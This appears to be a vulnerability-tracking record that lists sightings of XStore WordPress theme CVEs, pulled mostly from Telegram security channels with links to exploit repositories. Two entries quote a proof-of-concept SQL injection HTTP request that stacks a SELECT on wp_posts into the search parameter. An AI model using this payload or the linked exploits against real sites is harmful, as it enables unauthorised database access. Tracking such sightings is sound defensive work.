{"vulnerability": "CVE-2024-3355", "sightings": [{"uuid": "04f33fb0-16b9-4663-9b27-e1778215517e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33559", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10540", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n]-> https://github.com/Mr-xn/CVE-2024-32113\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection", "creation_timestamp": "2024-06-06T05:45:52.000000Z"}, {"uuid": "e92d227b-e2b0-42cb-9df4-015a1bdabfe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33559", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ls5h7ocisk2u", "content": "", "creation_timestamp": "2025-06-21T21:02:25.671003Z"}, {"uuid": "f1a45163-2b7e-486e-b73a-a60d3ab30522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33559", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lrjdiblcun27", "content": "", "creation_timestamp": "2025-06-13T21:02:19.540287Z"}, {"uuid": "c293de73-4487-451a-93b9-17ab106f6cfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33554", "type": "seen", "source": "Telegram/EpD1vRUQzW1Io8gSO0xtYh5IcXZP0UwleqYkRfuwNSvrfRxn", "content": "", "creation_timestamp": "2025-02-21T22:10:26.000000Z"}, {"uuid": "f8d9f459-55c3-4d22-a374-54d8b1c4a79e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33559", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/203", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection\n\n\ud83d\udcda ZeroEthical Course \ud83d\udc8e", "creation_timestamp": "2024-05-24T03:20:53.000000Z"}, {"uuid": "f6b2c5c1-885f-439a-b6a2-0eb8d621111d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "seen", "source": "Telegram/seW4YQz-REJyzTikkfHgsRZ4Ux5RhVM8gdZsQawfB68ACAph", "content": "", "creation_timestamp": "2025-02-21T22:10:26.000000Z"}, {"uuid": "06be9f57-6d33-4404-853c-3487b585c93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33553", "type": "seen", "source": "Telegram/VpnWbnQ87uuFml2Ip3AZCR0k2GeyYEjje_q3nJpLGIO3rieK", "content": "", "creation_timestamp": "2025-02-21T22:10:26.000000Z"}, {"uuid": "4b5be6a8-f209-4be7-aaac-ffee040cbc88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33558", "type": "seen", "source": "Telegram/2EV70mnLbSLSXm24xGAwPlT4erpF5KuKGzDwPjWHKjyqW62j", "content": "", "creation_timestamp": "2025-02-21T22:10:26.000000Z"}, {"uuid": "9c849dbf-57e0-40f8-ba93-437bb6c478f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "Telegram/Yjt6cu7IAmBNEpWkiwVSLBSyN66WJ3YX3P7NEa8-fBbAVow", "content": "", "creation_timestamp": "2024-06-25T06:56:30.000000Z"}, {"uuid": "5caef18d-17b5-4473-ae0e-e0b78690ecce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-3355", "type": "seen", "source": "Telegram/jYF03DS7IBNUp47LQstMPgcyOFurGDrl68-vaAXq4sZzpwXO", "content": "", "creation_timestamp": "2025-02-14T10:01:40.000000Z"}, {"uuid": "a2e63225-9ac6-4102-b1a8-148141eb8407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/228", "content": "CVE-2024-33551\n\u26d4\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL inj, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 8theme XStore, \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u0431\u0430\u0437\u0435 WordPress. \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1", "creation_timestamp": "2024-05-17T14:08:04.000000Z"}, {"uuid": "c68f6fdf-f76d-497b-b377-2b7f330f9d4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33559", "type": "seen", "source": "https://t.me/arpsyndicate/4963", "content": "#ExploitObserverAlert\n\nCVE-2024-33559\n\nDESCRIPTION: Exploit Observer has 11 entries in 5 file formats related to CVE-2024-33559. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.\n\nFIRST-EPSS: 0.000850000\nARPS-PRIORITY: 0.9323837", "creation_timestamp": "2024-05-28T10:07:58.000000Z"}, {"uuid": "eec32afa-5d51-4006-a997-22e684fa36b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2083", "content": "CVE-2024-33551\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL inj, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 8theme XStore, \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u0431\u0430\u0437\u0435 WordPress. \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\n#wordpress #sql", "creation_timestamp": "2024-05-17T09:37:07.000000Z"}]}